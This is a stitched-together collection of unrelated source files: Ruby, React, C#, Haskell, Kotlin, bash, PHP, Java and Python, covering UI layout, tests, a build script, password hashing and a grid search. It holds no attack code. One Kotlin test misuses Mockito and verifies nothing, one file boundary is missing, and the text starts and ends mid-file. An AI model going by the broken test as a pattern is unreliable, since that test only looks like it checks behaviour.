    test { ((1..10) - (0..9)).assert == [10] }
    test { ((1..10) - (4..10)).assert == [1..3] }
    test { ((1..10) - (4..12)).assert == [1..3] }
    test { ((1..10) - (1..6)).assert == [7..10] }
    test { ((1..10) - (-2..6)).assert == [7..10] }
    test { ((1..10) - (11..20)).assert == [1..10] }
    test { ((1..10) - (-10..0)).assert == [1..10] }
    test { ((1..10) - (-10..20)).assert == [] }
  end
end
|
import React from "react";
import styled from "@emotion/styled";
import { Column } from "./column";
import { GUTTER } from "./constants";
import { StyledGrid } from "./grid";
import { Row } from "./row";
import { GridOverlayGridProps, GridOverlayProps } from "./types";
// Translucent, non-interactive copy of the grid, centred horizontally and
// stretched over the full viewport height.
const GridOverlayGrid = styled(StyledGrid)<GridOverlayGridProps>`
  position: ${({ position }) => position};
  z-index: 99999;
  top: 0;
  bottom: 0;
  left: 50%;
  transform: translateX(-50%);
  margin: 0;
  pointer-events: none;
  opacity: 0.15;
`;
// Column content area painted red; the gutter on each side is painted blue
// via box-shadows sized from the GUTTER custom property.
const GridOverlayColumn = styled(Column)`
  height: 100%;
  background-clip: content-box, border-box;
  background-image: linear-gradient(red, red), linear-gradient(transparent, transparent);
  box-shadow: calc(var(${GUTTER}) * 1px) 0 0 blue, calc(var(${GUTTER}) * -1px) 0 0 blue;
`;
// The area outside the row (left/right margins) is painted green via two
// half-viewport box-shadows.
const GridOverlayRow = styled(Row)`
  height: 100%;
  overflow: hidden;
  box-shadow: 50vw 0 0 green, -50vw 0 0 green;
`;
// Round floating button in the bottom-right corner used to toggle the overlay.
const Toggle = styled.button<Pick<GridOverlayProps, "position">>`
  position: ${({ position }) => position};
  z-index: 100000;
  bottom: 8px;
  right: 8px;
  height: 48px;
  width: 48px;
  padding: 8px;
  background: #000;
  color: #fff;
  border: 0;
  border-radius: 50%;
`;
export const GridLayer: React.FC<GridOverlayProps> = ({ position, className }) => {
return (
<GridOverlayGrid position={position} className={className}>
<GridOverlayRow>
{Array(12)
.fill(Boolean)
.map((x, i) => (
<GridOverlayColumn key={i} s={1}>
</GridOverlayColumn>
))}
</GridOverlayRow>
</GridOverlayGrid>
);
};
/**
 * Grid overlay with optional toggle button.
 *
 * When `toggle` is true a floating button shows/hides the overlay; otherwise
 * visibility is fixed by `initialActive` (read once, on first render).
 */
export const GridOverlay: React.FC<GridOverlayProps> = ({
  className,
  initialActive,
  toggle,
  position,
}) => {
  // Current overlay visibility; flipped by the toggle button.
  const [active, setActive] = React.useState(initialActive);
  // Functional update keeps the callback stable (empty dependency list).
  const handleClick = React.useCallback(() => setActive(state => !state), []);
  return (
    <>
      {toggle && (
        <Toggle onClick={handleClick} position={position} data-test-id="grid-toggle">
          {active ? "gridOff" : "grid"}
        </Toggle>
      )}
      {active && <GridLayer position={position} className={className} />}
    </>
  );
};
// Overlay is fixed-position unless the caller overrides `position`.
GridOverlay.defaultProps = {
  position: "fixed",
};
|
using System;
using System.Collections.Generic;
namespace CSF.WebDriverExtras.Config
{
  /// <summary>
  /// Describes a type which implements <see cref="ICreatesWebDriver"/>, along with a set of options which should be
  /// used with that type.
  /// </summary>
  public interface IDescribesWebDriverFactory
  {
    /// <summary>
    /// Gets the assembly-qualified type name for the web driver factory.
    /// </summary>
    /// <returns>The assembly-qualified type name.</returns>
    string GetFactoryAssemblyQualifiedTypeName();

    /// <summary>
    /// Gets a collection of key/value pairs which describe public settable properties of a 'webdriver factory options'
    /// type, along with the values for those properties.
    /// </summary>
    /// <remarks>
    /// Both keys and values are strings; converting values to the option
    /// properties' actual types is the consumer's responsibility.
    /// </remarks>
    /// <returns>The option key/value pairs.</returns>
    IDictionary<string,string> GetOptionKeyValuePairs();
  }
}
|
{-# OPTIONS_HADDOCK hide #-}
module Render
( renderPicture
)
where
import qualified Graphics.UI.Threepenny as UI
import Graphics.UI.Threepenny.Core
import Foreign.JavaScript
import Control.Monad
import Data.List
import Data.List.Split
import Picture
import Color
import Text
-- | Draw a 'Picture' onto the given canvas element.
--
-- The canvas draw state is saved and restored around the render, and the
-- origin is first translated to the canvas centre, so picture coordinates
-- are centre-relative.
renderPicture :: Picture -> Element -> UI ()
renderPicture picture canvas = do
  canvas # saveDrawState
  canvas # translateMiddle
  canvas # drawPicture picture
  canvas # restoreDrawState
  return ()
-- | Render one 'Picture' constructor onto the canvas. Transform/style
-- constructors (Scale, Translate, Color, Stroke) save the draw state, apply
-- their modifier, recurse, and restore. Shapes are drawn filled at the
-- current origin. Unhandled constructors fall through to a no-op.
drawPicture :: Picture -> Element -> UI ()
drawPicture (Blank) canvas = do
  return ()
-- Full circle of the given radius, centred on the origin.
drawPicture (Circle radius) canvas = do
  canvas # UI.beginPath
  canvas # UI.arc (0, 0) (radius) (-pi) pi
  canvas # UI.closePath
  canvas # UI.fill
  return ()
-- Pie slice: angles are given in degrees and converted to radians here.
drawPicture (Arc startAngle endAngle radius) canvas = do
  canvas # UI.beginPath
  canvas # UI.moveTo (0, 0)
  canvas
    # UI.arc (0, 0) (radius) (startAngle * (pi / 180)) (endAngle * (pi / 180))
  canvas # UI.closePath
  canvas # UI.fill
  return ()
-- Axis-aligned rectangle centred on the origin.
drawPicture (Rectangle width height) canvas = do
  canvas # UI.beginPath
  canvas # drawRectangle (0 - (width / 2), 0 - (height / 2)) width height
  canvas # UI.fill
  return ()
-- Outline the sub-picture's path with the given colour and line width.
-- NOTE(review): UI.stroke runs *after* restoreDrawState, so it strokes with
-- the restored (outer) style rather than the one set above — confirm this
-- ordering is intended.
drawPicture (Stroke color size picture) canvas = do
  canvas # saveDrawState
  canvas # set' UI.strokeStyle (convertColor color)
  canvas # set' UI.lineWidth size
  canvas # drawPicture picture
  canvas # restoreDrawState
  canvas # UI.stroke
  return ()
-- Centre-aligned text at the origin in the requested font and size.
drawPicture (Text string font fontSize) canvas = do
  canvas # set' UI.textAlign (UI.Center)
  canvas # set' UI.textFont (getCombinedFont font fontSize)
  canvas # UI.fillText string (0, 0)
  return ()
-- Remote image, centred on the origin.
drawPicture (Image (Url url) width height) canvas = do
  img <- UI.img # set UI.src url
  canvas # drawImage img (0 - (width / 2), 0 - (height / 2)) width height
  return ()
-- Local image served from threepenny's static-file endpoint.
drawPicture (Image (File file) width height) canvas = do
  img <- UI.img # set
    UI.src
    ("http://127.0.0.1:8023/static/" ++ file)
  canvas # drawImage img (0 - (width / 2), 0 - (height / 2)) width height
  return ()
drawPicture (Scale x y picture) canvas = do
  canvas # saveDrawState
  canvas # scalePicture (x, y)
  canvas # drawPicture picture
  canvas # restoreDrawState
  return ()
drawPicture (Translate x y picture) canvas = do
  canvas # saveDrawState
  canvas # translatePicture (x, y)
  canvas # drawPicture picture
  canvas # restoreDrawState
  return ()
-- Draw each picture in order; the empty list falls through to the no-op
-- catch-all at the bottom.
drawPicture (Pictures (picture : pictures)) canvas = do
  canvas # drawPicture picture
  canvas # drawPicture (Pictures pictures)
  return ()
-- Lines and polygons need at least two points to produce any output.
drawPicture (Line (_ : [])) _ = do
  return ()
drawPicture (Line ([])) _ = do
  return ()
drawPicture (Line ((x, y) : rest)) canvas = do
  canvas # UI.beginPath
  canvas # UI.moveTo (x, y)
  forM_ rest (\(x', y') -> canvas # UI.lineTo (x', y'))
  canvas # UI.stroke
  return ()
drawPicture (Polygon (_ : [])) _ = do
  return ()
drawPicture (Polygon ([])) _ = do
  return ()
-- Closed, filled polygon through the given vertices.
drawPicture (Polygon ((x, y) : rest)) canvas = do
  canvas # UI.beginPath
  canvas # UI.moveTo (x, y)
  forM_ rest (\(x', y') -> canvas # UI.lineTo (x', y'))
  canvas # UI.closePath
  canvas # UI.fill
  return ()
-- Set the fill colour for the sub-picture, then restore the previous one.
drawPicture (Color color picture) canvas = do
  canvas # saveDrawState
  canvas # set' UI.fillStyle (UI.htmlColor $ convertColor color)
  canvas # drawPicture picture
  canvas # restoreDrawState
  return ()
-- Catch-all: anything not handled above draws nothing.
drawPicture _ _ = do
  return ()
-- | Scale subsequent drawing by (sx, sy) via the 2D context.
scalePicture :: Point -> UI.Canvas -> UI ()
scalePicture (sx, sy) canvas =
  UI.runFunction $ ffi "%1.getContext('2d').scale(%2, %3)" canvas sx sy

-- | Push the current canvas draw state (transform, styles) onto its stack.
saveDrawState :: UI.Canvas -> UI ()
saveDrawState canvas = UI.runFunction $ ffi "%1.getContext('2d').save()" canvas

-- | Pop the most recently saved canvas draw state.
restoreDrawState :: UI.Canvas -> UI ()
restoreDrawState canvas =
  UI.runFunction $ ffi "%1.getContext('2d').restore()" canvas

-- | Reset the canvas transform to the identity matrix.
resetTransform :: UI.Canvas -> UI ()
resetTransform canvas = UI.runFunction
  $ ffi "%1.getContext('2d').setTransform(1, 0, 0, 1, 0, 0)" canvas

-- | Translate subsequent drawing by (tx, ty).
translatePicture :: Point -> UI.Canvas -> UI ()
translatePicture (tx, ty) canvas =
  UI.runFunction $ ffi "%1.getContext('2d').translate(%2, %3)" canvas tx ty

-- | Move the origin to the centre of the canvas.
translateMiddle :: UI.Canvas -> UI ()
translateMiddle canvas = UI.runFunction
  $ ffi "%1.getContext('2d').translate(%1.width/2, %1.height/2)" canvas

-- | Draw an image element at (x, y) scaled to width x height.
drawImage :: UI.Element -> Vector -> Double -> Double -> UI.Canvas -> UI ()
drawImage image (x, y) width height canvas = UI.runFunction $ ffi
  "%1.getContext('2d').drawImage(%2,%3,%4,%5,%6)"
  canvas
  image
  x
  y
  width
  height

-- | Add a rectangle at (x, y) of width x height to the current path
-- (filled/stroked by the caller).
drawRectangle :: Vector -> Double -> Double -> UI.Canvas -> UI ()
drawRectangle (x, y) width height canvas = UI.runFunction $ ffi
  "%1.getContext('2d').rect(%2,%3,%4,%5)"
  canvas
  x
  y
  width
  height
-- | Map a file name's extension (text after the final dot) to its MIME
-- type, defaulting to \"image\" for anything unrecognised.
getMimeType :: String -> String
getMimeType fileName = maybe "image" id (lookup extension mimeTable)
 where
  extension = last (splitOn "." fileName)
  mimeTable =
    [ ("apng" , "image/apng")
    , ("bmp"  , "image/bmp")
    , ("gif"  , "image/gif")
    , ("ico"  , "image/x-icon")
    , ("cur"  , "image/x-icon")
    , ("jpg"  , "image/jpeg")
    , ("jpeg" , "image/jpeg")
    , ("jfif" , "image/jpeg")
    , ("pjpeg", "image/jpeg")
    , ("pjp"  , "image/jpeg")
    , ("png"  , "image/png")
    , ("svg"  , "image/svg+xml")
    , ("tif"  , "image/tiff")
    , ("tiff" , "image/tiff")
    , ("webp" , "image/webp")
    ]
|
package com.berteodosio.seriemesmo.data.tmdb.repository
import com.berteodosio.seriemesmo.data.tmdb.model.TmdbShow
import io.reactivex.Single
import org.junit.Test
import org.mockito.kotlin.any
import org.mockito.kotlin.mock
import org.mockito.kotlin.whenever
class TmdbDefaultRepositoryTest {
    // NOTE(review): `createRepository()` returns a *real* TmdbDefaultRepository
    // (only its constructor dependency is a mock), yet `whenever(...)` is used
    // on it — Mockito can only stub mocks/spies, so this stubbing is invalid.
    // Also `any()` is invoked here outside a stubbing/verification context,
    // which is a matcher misuse. As written, these tests exercise the (broken)
    // stubbing rather than the repository's behaviour — confirm and rework.
    @Test
    fun `Test fetch show details success case`() {
        val repository = createRepository()
        val tmdbShow: TmdbShow = mock()
        whenever(repository.fetchShowDetails(any()))
            .thenReturn(Single.just(tmdbShow))
        val testObserver = repository.fetchShowDetails(any()).test()
        testObserver
            .assertComplete()
            .assertNoErrors()
            .assertValue(tmdbShow)
    }
    @Test
    fun `Test fetch show details failure case`() {
        val exception = Exception("General error")
        val repository = createRepository()
        whenever(repository.fetchShowDetails(any()))
            .thenReturn(Single.error(exception))
        val testObserver = repository.fetchShowDetails(any()).test()
        testObserver
            .assertError(exception)
    }
    // Builds the repository under test with a mocked constructor dependency.
    private fun createRepository(): TmdbDefaultRepository {
        return TmdbDefaultRepository(mock())
    }
}
|
#!/bin/bash
# Build and package DSI Studio on macOS: clone fresh sources, merge the TIPL
# headers into the source tree as "image", build with qmake/make, then
# package and publish the dmg.
# NOTE(review): there is no error handling — a failed clone, make, or copy
# silently continues to the next step; consider `set -euo pipefail`.

# Start from $HOME and remove any previous checkouts.
cd
rm -rf DSI-Studio
rm -rf TIPL
git clone http://github.com/frankyeh/DSI-Studio.git
git clone http://github.com/frankyeh/TIPL.git
# Strip generated build artefacts from the checkout.
cd DSI-Studio
rm Makefile*
rm *.Debug
rm *.Release
cd
# Assemble the build tree: sources at the root, TIPL under image/.
mkdir DSI-Studio-master
cd DSI-Studio-master
mkdir image
cd
cp -R DSI-Studio/* DSI-Studio-master/
cp -R TIPL/* DSI-Studio-master/image/
rm -rf DSI-Studio
rm -rf TIPL
# Generate the project file and build in release mode.
cd DSI-Studio-master
qmake -project
qmake -config release
make clean
make
# Bundle the app into a dmg and publish it to the Dropbox share.
macdeployqt dsi_studio.app -dmg
mv dsi_studio.dmg dsi_studio_64.dmg
cp dsi_studio_64.dmg /Users/frank/Dropbox/DSI\ Studio/
|
package com.popov.egeanswers.model

// Exam variant kind: EGE (unified state exam) or OGE (basic state exam).
enum class VariantType {
    EGE, OGE
}
|
<?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use App\Models\user;
class UpdateController extends Controller
{
    /**
     * The user being updated; loaded in validation() and reused by update().
     *
     * @var User|null
     */
    private $user;

    /**
     * Validate the submitted profile data, persist it, and redirect back
     * with a success message.
     *
     * @param Request $request
     * @return \Illuminate\Http\RedirectResponse
     */
    public function index(Request $request) {
        // Validate user input (also loads $this->user from the request id).
        $this->validation($request);
        // Update user data.
        $this->update($request);
        // NOTE(review): message text (incl. the "pembuaruan" typo) kept as-is;
        // it may be asserted elsewhere.
        return \Redirect::back()->withErrors(['msg' => 'pembuaruan berhasil!']);
    }

    /**
     * Validate the request. When the email or username differs from the
     * stored value, the new value must not belong to another account;
     * otherwise the standard field rules apply.
     *
     * @param Request $request
     * @return void
     */
    private function validation($request) {
        $checkEmail = null;
        $checkUsername = null;
        $this->user = User::find($request->id);
        if($request->email !== $this->user->email) {
            //check if new email is available
            $checkEmail = User::where('email', $request->email)->first();
        }
        if($request->username !== $this->user->username) {
            // BUG FIX: the original queried the `email` column here, so a
            // changed username was never actually checked for availability.
            $checkUsername = User::where('username', $request->username)->first();
        }
        if($checkEmail === null && $checkUsername === null){
            $request->validate([
                'name' => ['required', 'string', 'max:255'],
                'email' => ['required', 'string', 'email', 'max:255'],
                'gender' => ['required', 'string', 'in:l,p'],
                'no_ktp' => ['required', 'string'],
                'date_of_birth' => ['required', 'date'],
                'phone_number' => ['required', 'string', 'min:12', 'max:20'],
                'image' => ['image', 'max:1024']
            ]);
        }else{
            // New email or username is taken: the unique rules below fail
            // validation and redirect back with the appropriate messages.
            $request->validate([
                'username' => ['required', 'string', 'max:30', 'unique:users'],
                'email' => ['required', 'string', 'email', 'max:255', 'unique:users'],
            ]);
        }
    }

    /**
     * Copy the validated fields onto the loaded user and save. The photo is
     * replaced only when a new image was uploaded.
     *
     * @param Request $request
     * @return void
     */
    private function update($request) {
        $this->user->email = $request->email;
        $this->user->name = $request->name;
        $this->user->gender = $request->gender;
        $this->user->no_ktp = $request->no_ktp;
        $this->user->date_of_birth = $request->date_of_birth;
        $this->user->phone_number = $request->phone_number;
        if($request->image !== null) {
            $this->user->photo_path = $this->storeImage($request->file('image'));
        }
        $this->user->save();
    }

    /**
     * Store the uploaded image under storage/app/public/assets.
     *
     * @param \Illuminate\Http\UploadedFile $image
     * @return string relative storage path of the stored file
     */
    private function storeImage($image) {
        // The original assigned to an unused local ($path) inside the return.
        return $image->store('public/assets');
    }
}
|
// !CHECK_TYPE
// Compiler-diagnostics fixture: checks that `a!!` smart-casts `a` to Int
// through indexed get/set operator-convention calls. The <!...!> markers are
// expected-diagnostic ranges consumed by the test runner.
interface G {
    operator fun get(x: Int, y: Int): Int = x + y
    operator fun set(x: Int, y: Int, value: Int) {}
}
// First `!!` smart-casts `a`; the second is reported as unnecessary.
fun foo1(a: Int?, b: G) {
    b[a!!, a<!UNNECESSARY_NOT_NULL_ASSERTION!>!!<!>] = <!DEBUG_INFO_SMARTCAST!>a<!>
    checkSubtype<Int>(<!DEBUG_INFO_SMARTCAST!>a<!>)
}
// `!!` in an argument position still smart-casts later uses.
fun foo2(a: Int?, b: G) {
    b[0, a!!] = <!DEBUG_INFO_SMARTCAST!>a<!>
    checkSubtype<Int>(<!DEBUG_INFO_SMARTCAST!>a<!>)
}
// Same checks through the `get` convention.
fun foo3(a: Int?, b: G) {
    val r = b[a!!, <!DEBUG_INFO_SMARTCAST!>a<!>]
    checkSubtype<Int>(<!DEBUG_INFO_SMARTCAST!>a<!>)
    checkSubtype<Int>(r)
}
fun foo4(a: Int?, b: G) {
    val r = b[0, a!!]
    checkSubtype<Int>(<!DEBUG_INFO_SMARTCAST!>a<!>)
    checkSubtype<Int>(r)
}
|
module GoatGuardian.Password where
import Control.Monad.IO.Class (MonadIO, liftIO)
import Crypto.Scrypt (EncryptedPass(EncryptedPass), Pass(Pass), encryptPassIO', getEncryptedPass, verifyPass')
import Data.Text (Text)
import Data.Text.Encoding (decodeUtf8With, encodeUtf8)
import Data.Text.Encoding.Error (lenientDecode)
-- | Hash a plaintext password with scrypt. 'encryptPassIO'' uses the
-- library's default parameters and generates a fresh random salt on every
-- call, hence the 'MonadIO' constraint and non-deterministic output.
hashPass
  :: MonadIO m
  => Text -- ^ password
  -> m Text -- ^ hashed password
hashPass pass = do
  hashedPassBS <- liftIO $ encryptPassIO' (Pass $ encodeUtf8 pass)
  pure $ decodeUtf8With lenientDecode (getEncryptedPass hashedPassBS)

-- | Verify a plaintext password against a hash produced by 'hashPass'.
-- Pure: the salt and parameters are embedded in the hash itself.
checkPass
  :: Text -- ^ password
  -> Text -- ^ hashed password
  -> Bool
checkPass pass hash =
  verifyPass'
    (Pass $ encodeUtf8 pass)
    (EncryptedPass $ encodeUtf8 hash)
# frozen_string_literal: true
# Mixin that adds tagging (acts_as_taggable) plus a validation rejecting
# tags that contain whitespace.
module Taggable
  extend ActiveSupport::Concern

  included do
    acts_as_taggable
    validate :tag_list_validation
  end

  # Adds a "contains whitespace" error (Japanese message) when any tag
  # matches the whitespace pattern. NOTE(review): the lookahead
  # `(?=.*\s+|.* +)` looks redundant — ` +` is already covered by `\s+`;
  # confirm before simplifying.
  def tag_list_validation
    return unless tag_list.any? { |tag| tag =~ /\A(?=.*\s+|.* +).*\z/ }

    errors.add(:tag_list, 'に空白が含まれています')
  end
end
|
<?php
namespace app;
use PhpDevil\web\Application;
/**
 * Class WebApplication
 * Front controller of the web application.
 * @package app
 */
class WebApplication extends Application
{
    /**
     * Namespace containing the application's controllers.
     * @var string
     */
    protected $controllersNamespace = '\\app\\controllers';

    /**
     * Namespace containing the console commands.
     * @var string
     */
    protected $commandsNamespace = '\\app\\commands';

    /**
     * Loads the component's default configuration.
     * @return array
     */
    public static function loadDefaultConfig()
    {
        return require __DIR__ . '/config/application.php';
    }

    /**
     * Path to the application-level views directory.
     * @return string
     */
    public static function getViewsPath()
    {
        return __DIR__ . '/views';
    }

    /**
     * Includes the default frontend controller and starts the application.
     * @param array|null $request
     * @return mixed
     */
    public function run(array $request = null)
    {
        require_once __DIR__ . '/controllers/DefaultFrontendController.php';
        return parent::run($request);
    }
}
|
/*
Copyright (C) 2016 Koji Wakamiya
Copyright (C) 2016 Masanori Kojima
Released under the MIT license
http://opensource.org/licenses/mit-license.php
*/
package com.sf_lolitahag.pitchs
/**
 * A "magic pitch" (makyu): the ball falls at a constant speed, pauses (and
 * spins) for [STOP_TIME] ms once it reaches [STOP_POSITION], then resumes
 * at a higher speed.
 */
class Makyu : IPitch {
    companion object {
        private const val BALL_SPEED = 20      // initial vertical speed per frame
        private const val ACCELERATION = 20    // extra speed gained after the pause
        private const val STOP_POSITION = 400  // y coordinate at which the ball pauses
        private const val STOP_TIME = 1000L    // pause duration, milliseconds
    }
    // True only while the ball is paused at STOP_POSITION.
    override var isSpin: Boolean = false
        private set
    // Wall-clock ms when the pause started; IPitch.NONE until it begins.
    private var postTime: Long = 0
    // Current per-frame vertical speed.
    private var ballSpeed: Int = 0
    init {
        // NOTE(review): these overwrite the property initializers above;
        // the declarations and init block could be merged.
        isSpin = true
        postTime = IPitch.NONE.toLong()
        ballSpeed = BALL_SPEED
    }
    // This pitch never moves horizontally.
    override fun getUpdateX(currentX: Int): Int {
        return IPitch.NONE
    }
    // Vertical delta for this frame. While within the pause window the ball
    // stays put (returns IPitch.NONE) and spins; the speed bump is applied
    // once, on the first paused frame.
    override fun getUpdateY(currentY: Int): Int {
        val currentTime = System.currentTimeMillis()
        if (currentY >= STOP_POSITION && (postTime == IPitch.NONE.toLong() || currentTime - postTime < STOP_TIME)) {
            if (postTime == IPitch.NONE.toLong()) {
                postTime = currentTime
                ballSpeed += ACCELERATION
            }
            isSpin = true
            return IPitch.NONE
        } else {
            isSpin = false
        }
        return ballSpeed
    }
}
|
package presentationcontext
// Result represents the result of a presentation context negotiation.
// NOTE(review): the names suggest the DICOM A-ASSOCIATE presentation
// context result values — confirm the iota numbering matches the wire
// protocol before relying on the numeric values.
type Result uint16

const (
	// Acceptance indicates that the proposed presentation context was accepted.
	Acceptance Result = iota
	// UserRejection indicates that the proposed presentation context was rejected
	// by the user.
	UserRejection
	// ProviderRejection indicates that the proposed presentation context was rejected
	// by the provider.
	ProviderRejection
)
|
import { IPrizeType } from '../models/interfaces';
import { PrizeTypeSchema } from '../data/schema/PrizeType';
import RepositoryBase from './base/RepositoryBase';
// Repository for PrizeType documents; all data-access behaviour comes from
// RepositoryBase, parameterised here with the PrizeType schema.
class PrizeTypeRepository extends RepositoryBase<IPrizeType> {
  constructor() {
    super(PrizeTypeSchema);
  }
}
// Prevent further properties from being attached to the class object.
Object.seal(PrizeTypeRepository);
// `export =` keeps CommonJS interop (`import X = require(...)`).
export = PrizeTypeRepository;
|
# scoped_block: A crafty little extension to execute blocks with an object's scope.
# by: Slippy Douglas
# Use like this:
#
# 5.in_scope do
# puts self.to_f
# end
#
# @fix: needs a fall-through to the scope it was called from
class Object
  # Evaluates the block with this object as `self`, so bare method calls
  # inside the block resolve against the receiver.
  def in_scope(&block)
    self.instance_eval(&block)
  end
end
# Use like this:
#
# [5, 10].each(&arg_scope do
# puts self.to_f
# end)
#
# @fix: strange bugs with active_support/option_merger when nested 3 levels deep in routes.rb
# @fix: doesn't play well in ERB files
#module Kernel
# def arg_scope(&block)
# return lambda { |*args|
# args.shift.instance_eval(&block)
# }
# end
#end
|
package tools.tracesviewer;
import java.awt.*;
import java.util.*;
/**
* Lays out components within a Container such that each component takes a fixed percentage of the size.
*
* Each Component added to the Container must have a Constraint object that specifies what proportion
* of the container it will fill. The Component will be stretched to fill exactly that percentage.
*
* @see Constraint
*/
public class PercentLayout implements LayoutManager2 {

    /** Maps each managed component to its percentage constraint. */
    private Hashtable<Component, PercentLayoutConstraint> hash =
        new Hashtable<Component, PercentLayoutConstraint>();

    /**
     * Registers a component with its {@code PercentLayoutConstraint}.
     *
     * @throws IllegalArgumentException if the constraint is of any other type
     */
    public void addLayoutComponent(Component component, Object constraint) {
        if (constraint instanceof PercentLayoutConstraint) {
            hash.put(component, (PercentLayoutConstraint) constraint);
        } else {
            throw new IllegalArgumentException("Invalid constraint");
        }
    }

    /** String constraints are not supported; always throws. */
    public void addLayoutComponent(String constraint, Component comp) {
        throw new IllegalArgumentException("Invalid constraint");
    }

    public void removeLayoutComponent(Component component) {
        hash.remove(component);
    }

    /**
     * Preferred size: for each child, extrapolates the container size that
     * would give the child its preferred size at its percentage, then
     * averages over all children.
     */
    public Dimension preferredLayoutSize(Container p1) {
        int n = hash.size();
        // BUG FIX: the original divided by hash.size() unconditionally and
        // threw ArithmeticException when no components had been added.
        if (n == 0) {
            return new Dimension(0, 0);
        }
        int prefx = 0;
        int prefy = 0;
        for (Map.Entry<Component, PercentLayoutConstraint> entry : hash.entrySet()) {
            PercentLayoutConstraint constraint = entry.getValue();
            Dimension pref = entry.getKey().getPreferredSize();
            prefx += pref.width * 100 / constraint.width;
            prefy += pref.height * 100 / constraint.height;
        }
        return new Dimension(prefx / n, prefy / n);
    }

    /**
     * Minimum size: the largest container size any single child requires to
     * reach its minimum size at its percentage.
     */
    public Dimension minimumLayoutSize(Container p1) {
        int minx = 0;
        int miny = 0;
        for (Map.Entry<Component, PercentLayoutConstraint> entry : hash.entrySet()) {
            PercentLayoutConstraint constraint = entry.getValue();
            Dimension min = entry.getKey().getMinimumSize();
            int mx = (int) (min.width * 100 / constraint.width);
            int my = (int) (min.height * 100 / constraint.height);
            if (mx > minx)
                minx = mx;
            if (my > miny)
                miny = my;
        }
        return new Dimension(minx, miny);
    }

    /**
     * Maximum size: the smallest container size at which any child would
     * exceed its maximum; unbounded children stay {@code Integer.MAX_VALUE}.
     */
    public Dimension maximumLayoutSize(Container p1) {
        int maxx = Integer.MAX_VALUE;
        int maxy = Integer.MAX_VALUE;
        for (Map.Entry<Component, PercentLayoutConstraint> entry : hash.entrySet()) {
            PercentLayoutConstraint constraint = entry.getValue();
            Dimension max = entry.getKey().getMaximumSize();
            int mx =
                max.width == Integer.MAX_VALUE
                    ? max.width
                    : (int) (max.width * 100 / constraint.width);
            int my =
                max.height == Integer.MAX_VALUE
                    ? max.height
                    : (int) (max.height * 100 / constraint.height);
            if (mx < maxx)
                maxx = mx;
            if (my < maxy)
                maxy = my;
        }
        return new Dimension(maxx, maxy);
    }

    /** Positions and sizes every child at its percentage of the container. */
    public void layoutContainer(Container p1) {
        Dimension size = p1.getSize();
        for (Map.Entry<Component, PercentLayoutConstraint> entry : hash.entrySet()) {
            PercentLayoutConstraint constraint = entry.getValue();
            int x = (int) (size.width * constraint.x / 100);
            int y = (int) (size.height * constraint.y / 100);
            int width = (int) (size.width * constraint.width / 100);
            int height = (int) (size.height * constraint.height / 100);
            entry.getKey().setBounds(x, y, width, height);
        }
    }

    public void invalidateLayout(Container p1) {
        // No cached state to discard.
    }

    public float getLayoutAlignmentY(Container p1) {
        return 0.5f;
    }

    public float getLayoutAlignmentX(Container p1) {
        return 0.5f;
    }
}
|
import React, { useState, useEffect } from "react";
import { Link, Redirect } from "react-router-dom";
import axios from "axios";
const Register = () => {
useEffect(() => {
const token = localStorage.getItem("x-auth-token");
if (token) {
setIsAuthenticated(true);
}
}, []);
const [name, setName] = useState("");
const [email, setEmail] = useState("");
const [password, setPassword] = useState("");
const [repeatPassword, setRepeatPassword] = useState("");
const [errors, setErrors] = useState([]);
const [isAuthenticated, setIsAuthenticated] = useState(false);
const onSubmit = async (e) => {
e.preventDefault();
if (
email === "" ||
password === "" ||
repeatPassword === "" ||
name === ""
) {
setErrors([...errors, "All fields must be filled"]);
} else if (password !== repeatPassword) {
setErrors([...errors, "Passwords dont match"]);
}
if (errors.length > 0) return setTimeout(() => setErrors([]), 3000);
try {
const config = {
headers: {
"Content-Type": "application/json",
},
};
const body = JSON.stringify({ name, email, password });
const res = await axios.post("/api/register", body, config);
const token = res.data.token;
localStorage.setItem("x-auth-token", token);
setIsAuthenticated(true);
} catch (err) {
var errs = err.response.data.errors;
var newErrs = [];
errs.map((currentErr) => newErrs.push(currentErr.msg));
setErrors(newErrs);
return setTimeout(() => setErrors([]), 3000);
}
};
if (isAuthenticated) {
return <Redirect to="/chat" />;
}
return (
<div className="mainApp ">
<div className="container row align-items-center h-100 justify-content-center">
<form className="text-center w-50" onSubmit={(e) => onSubmit(e)}>
<div>
<h2>iChat</h2>
</div>
{errors.map((error) => {
return (
<div
className="alert alert-danger"
role="alert"
style={{ height: "2.7rem" }}
key={error}
>
{error}
</div>
);
})}
<div className="srch_bar w-100 pb-2">
<input
type="text"
className="w-100"
placeholder="Name"
value={name}
onChange={(e) => setName(e.target.value)}
required={true}
/>
</div>
<div className="srch_bar w-100 pb-2">
<input
type="email"
className="w-100"
value={email}
onChange={(e) => setEmail(e.target.value)}
placeholder="Email"
required={true}
/>
</div>
<div className="srch_bar w-100 pb-2">
<input
type="password"
className="w-100"
placeholder="Password"
value={password}
onChange={(e) => setPassword(e.target.value)}
required={true}
/>
</div>
<div className="srch_bar w-100 pb-3">
<input
type="password"
className="w-100"
placeholder="Repeat Password"
value={repeatPassword}
onChange={(e) => setRepeatPassword(e.target.value)}
required={true}
/>
</div>
<div className="pb-2" style={{ height: "2.7rem" }}>
<button className="w-100 h-100 btn btn-primary" type="submit">
Register
</button>
</div>
<div className="text-right">
Already a user? <Link to="/">Login Here</Link>
</div>
</form>
</div>
</div>
);
};
export default Register;
|
###PLEASE RUN USING PYTHON3
###AUTHOR: ADITYA D PAI
import heapq as hp
import sim2
import sys
import random
from termcolor import colored
#Implementation of Priority Queue using Heap data structure
class PQ:
    """Minimal min-priority queue backed by a binary heap (heapq)."""

    def __init__(self):
        # Heap of (priority, node) tuples; the smallest priority pops first.
        self.items = []

    def insert(self, node, priority):
        """Add *node* to the queue with the given *priority*."""
        hp.heappush(self.items, (priority, node))

    def get(self):
        """Remove and return the node with the lowest priority."""
        return hp.heappop(self.items)[1]

    def isEmpty(self):
        """Return True when the queue holds no items.

        Returns a bool instead of the previous 1/0 ints; truthiness is
        preserved for existing callers such as `while not lead.isEmpty()`.
        """
        return len(self.items) == 0
#Find adjacent cells that are clear
def checkAdj(size, index, obstacles):
    """Return the in-bounds, non-obstacle 4-neighbours of *index*.

    size      -- (width, height) of the grid
    index     -- (x, y) cell whose neighbourhood is examined
    obstacles -- collection of blocked (x, y) cells
    """
    x, y = index
    width, height = size
    # Four-connected neighbourhood, in right/down/left/up order.
    candidates = ((x + 1, y), (x, y - 1), (x - 1, y), (x, y + 1))
    return [
        cell
        for cell in candidates
